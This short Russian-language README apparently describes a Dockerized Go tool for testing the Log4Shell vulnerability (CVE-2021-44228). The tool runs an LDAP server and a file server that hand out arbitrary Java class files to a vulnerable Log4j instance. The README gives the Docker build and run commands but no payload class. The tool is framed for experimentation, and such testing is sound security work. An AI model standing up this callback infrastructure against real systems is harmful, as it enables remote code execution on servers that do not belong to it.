
Докеризованное Go-приложение для тестирования уязвимости CVE-2021-44228
Простое Go-приложение / Docker-образ для экспериментов с уязвимостью CVE-2021-44228. Разворачивает простой файловый сервер и LDAP-сервер, который отдаёт любые классы, размещённые на файловом сервере: ldap://ip:1389/Hello -> http://ip:8080/Hello.class
docker build -t log4shell .
docker run -it -v "path-to-classes:/files" -p 1389:1389 -p 8080:8080 -e HOST=localhost log4shell